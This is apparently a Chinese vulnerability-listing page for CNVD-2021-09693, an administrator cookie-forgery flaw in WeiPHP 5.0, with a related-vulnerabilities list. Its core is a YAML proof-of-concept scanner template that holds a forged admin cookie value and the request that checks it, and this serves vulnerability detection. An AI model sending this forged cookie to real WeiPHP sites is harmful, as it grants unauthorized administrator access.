CNVD-2021-09693: WeiPHP5.0 任意用户Cookie伪造 CNVD-2021-09693

日期: 2025-09-01 | 影响软件: WeiPHP5.0 | POC: 已公开

漏洞描述

Weiphp5.0 存在管理员用户Cookie伪造，通过泄露的密钥数据，可利用加密方法来得到管理员的Cookie app="WeiPHP"

PoC代码[已公开]

id: CNVD-2021-09693

info:
  name: WeiPHP5.0 任意用户Cookie伪造 CNVD-2021-09693
  author: daffainfo
  severity: critical
  description: Weiphp5.0 存在管理员用户Cookie伪造，通过泄露的密钥数据，可利用加密方法来得到管理员的Cookie app="WeiPHP"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/WeiPHP5.0%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7Cookie%E4%BC%AA%E9%80%A0%20CNVD-2021-09693.md

rules:
  r0:
    request:
      method: GET
      path: /public/index.php/home/user/login/from/6/pbid/0
      headers:
        cookie: user_id=MDAwMDAwMDAwMLK2onQ
    expression: response.status == 200 && response.body.bcontains(b'客户端管理')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-09693.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

WeiPHP5.0 bind_follow 存在SQL注入漏洞 无POC

Weiphp5.0 前台文件任意读取 无POC

WeiPHP5.0beta版-信息泄露 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

WeiPHP5.0 bind_follow 存在SQL注入漏洞无POC

Weiphp5.0 前台文件任意读取无POC

WeiPHP5.0beta版-信息泄露无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC